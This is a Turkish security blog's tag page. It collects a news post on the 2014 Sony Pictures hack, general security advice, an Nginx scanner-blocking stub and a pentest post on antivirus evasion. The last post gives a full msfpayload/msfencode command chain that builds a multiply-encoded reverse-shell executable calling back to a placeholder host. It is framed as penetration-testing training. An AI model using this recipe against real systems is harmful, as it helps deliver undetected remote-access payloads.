hack etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
hack etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

11 Aralık 2014 Perşembe

Sony saldırısının arkasındaki Süpheli: Kuzey Kore.

Paylaşım Unknown on 02:20 with Şuan Yorum Yok







Sony Pictures Entertainment, geçtiğimiz günlerde stüdyolarına yönelik düzenlenen siber saldırının arkasında Kuzey Kore olduğunu ifade etti. Teknoloji haber sitesi Re/code’a göre, bu saldırı, Sony stüdyosunun bilgisayar ağlarını devre dışı bırakarak, şirketi ciddi zarara uğrattı.

Siber saldırı, Sony Pictures “The Interview” isimli filmi çıkarmadan bir ay önce gerçekleştirildi. Bu film, Kuzey Kore lideri Kim Jong Un’a suikast düzenlemek için CIA tarafından görevlendirilen iki gazeteciyi konu ediniyor. Pyongyang hükümetinin “terörizme fütursuz bir destek ve bir savaş sebebi” olarak nitelendirdiği film, Kuzey Kore yöneticilerini ciddi oranda rahatsız etmişti.

Sony Pictures’ın bilgisayar sistemi geçtiğimiz Pazartesi günü çöktü. Ekranlar kararmadan önce, kırmızı bir kurukafa ve “Hacked by #GOP” ibaresi görüldü. Los Angeles Times’ın haberine göre GOP, Guardians of Peace anlamına geliyor.

Siber saldırıyı düzenleyen hackerlar aynı zamanda Sony vericilerinden çalınmış çeşitli sırların ifşası yönünde tehditte bulundukları da kaydedildi.

Haber sitesi Re/code, cuma günü yayınladığı raporda ise, Kuzey Kore adına eylemlerde bulunan, muhtemelen Çin kökenli bir grubun saldırıların arkasında bulunabileceği yönünde Sony’nin araştırmalar
sürdürdüğünü bildirdi. Re/code ayrıca sözkonusu ülkelerle ilgili herhangi bir somut bağlantının henüz bulunamadığını da bilgiler arasına ekledi.

The Interview adlı fimin ABD’de 25 Aralık’ta gösterime girmesi planlanıyor. Filmde iki gazeteci, Kuzey Kore lideriyle planladıkları söyleşi sırasında onu öldürmek maksadıyla CIA tarafından görevlendiriliyor. Kuzey Kore Dışişleri Bakanlığı sözcüsü, film eğer gösterime girerse, “merhametsiz bir karşı saldırı” düzenleneceği konusunda tehditlerde bulunmuştu. Kuzey Kore hükümeti ayrıca, ABD Başkanı Barak Obama’ya, filmin gösterimini durdurması yönünde mektup da yazmıştı.

16 Kasım 2014 Pazar

Günümüz Güvenlik Gereklilikleri Ve Araçları.

Paylaşım Unknown on 10:05 with Şuan Yorum Yok



Günümüzde Web güvenliğimizi Sağlamak Gerçekten Çok güç bir konuma gelmiş vaziyette,
bir çok hack programları ve keyloglar ile kullanıcılar rahatlıkla avlana biliyor ki Örneğin Googleye
Facebook  Hack Skype Hack Twitter Hack Instagram Hack yazdığınızda birçok argüman ve
araçlara rastlayacaksınız  özellikle Programlar o programlar kullanıcılar  için büyük bir risk oluşturmakdadır
Çünki böyle bir program daha üretilememiştir o yüzden genelde avlayıcı yazılımlar olup 
bilgi güvenliğine büyük risk oluşturmaktadır.

Alacağımız Önlemler , Böyle zararlı yazılımları sistemimize indirmemizdir özellikle hack adı altında
kesinlikle program indirmeyiniz  hem kişisel bilgileriniz hem özel yaşantınız tehlikeye girebilir.
Ve en son  gelişmiş bir virüs programımı edinmemiz gerekmekdedir.


Bilgi güvenliği akademisi.

Nginx – Anti Web Scanner

Paylaşım Unknown on 09:48 with Şuan Yorum Yok


Nginx websunucunuz üzerine scanner uygulamaları üzerinden gelen GET/POST isteklerini user-agent üzerinden elimine edebilirsiniz. Böylece otomatize araçlar üzerinden zafiyet aramaya dönük davranışlar engellenecektir.
Bildiğiniz üzere user-agent imzaları web-scanner’ların bir bölümünde bellidir. Çoğu scanner user-agent üzerine imzasını eklemektedir.
Nginx konfigürasyonunun server { altına tanımlamayı eklemeniz gerekiyor.
user-agent örneğini fazlalaştırabilirsiniz.

26 Mart 2014 Çarşamba

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

Paylaşım Unknown on 07:22 with Şuan Yorum Yok
Pentest çalışmalarında, hedef sistemi ele geçirdikden sonra yetkisiz işlevleri yerine getirecek bir payload'a ihtiyaç duyulur. Bu bir casus yazılım olabilir (trojan), uzakdan yönetim aracı olabilir (rat) veya hedef sistemde kod/komut çalıştırmanıza olanak sağlayan bir araç   (shellcode exec) olabilir.

BGA pentest ekibi, pentest çalışmalarında ve eğitimlerde multi platform çalışan ve gelişmiş özellikleri olan meterpreter payloadını sıklıkla tercih etmektedir.

Antivirus veya sezgisel antilogger'lar bu tür durumlarda işinizi zorlaştırabilir. Bu yazıda, antiviruslerin çalışma prensiblerine kısaca değinilmiş ve meterpreter ajanının antivirusler tarafından tanınmaz hale getirilmesi teorik olarak anlatılmıştır. Burada anlatılan yöntemler, backtrack 5 r2 üzerinde test edilmiştir ve meterpreter için geçerlidir fakat bu mantık  benzeri yazılımlar içinde uygulanabilir !

Antivusler Nasıl Çalışır ?


  • İmza tabanlı (Signature Based)

  • ShellCode Analizi

  • Sezgisel (heuristic)


İmza tabanlı (Signature Based)


  • Her imza bir zararlının karakteristik özelliklerini barındırır.

  • Tespit edilmiş viruslere ait imzaları içerir.

  • Hızlı sonuç verir.

  • Yeni nesil viruslere karşı savunmasızdır.

  • Zararlının tespit edilmesi, veritabanına konulması ve son kullanıcıya ulaşması yeni nesil tehtitler karşısında ciddi zaman kaybı yaşatmakdadır.


Sezgisel (heuristic)


  • Zararlıyı, sezgisel ve gerçek zamanlı davranış analizi yaparak tespit etmeye çalışır.



Bu çalışma, metasploit framework projesinde bulunan farklı encoderları kullanarak meterpreter içeriğini antivirusler tarafından tanınmaz yapıp, ayrıca masum bir uygulama imajı kazandırmak üzere bir kaç satır kod eklemektedir.




Metasploit Multi Encoder Kullanımı




./msfpayload windows/shell/reverse_tcp  LHOST=1.1.1.1 LPORT=4443 EXITFUNC=thread R |  ./msfencode -e x86/shikata_ga_nai -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t raw | ./msfencode -e x86/jmp_call_additive -c 2 -t raw | ./msfencode -e x86/call4_dword_xor  -c 2 -t exe -o ajan007.exe


Raw olarak encoderlara gönderilen meterpreter içeriği, encoding işleminden  sonra hex olarak bir dosyaya aktarılır ve ardından bir kaç satır çöp kod (c++ kodu)   eklenerek binary dosya oluşturulur.




Bu uygulamayı yapan v5.sh scriptinden bir ekran görüntüsü







Uygulama eğitim ve test amaçlı geliştirilmiştir, kaynak kodu BGA eğitimine katılanlara ve pentest yapılan firmalara verilmektedir.




Bir kaç genel özelliği;


- Farklı bağlantı türlerine sahip (bind,reverse_http/https/tcp)  meterpreter payloadı oluşturabilmektedir.


- 32 bit 64 bit sistemlerde çalışabilmektedir.


- Linux, Windows ve *BSD ailesinden her türlü işletim sisteminde çalışabilmektedir.


- Unix ve Windows uygulamalarına enfekte olabilmektedir.


- Autorun Script Desteği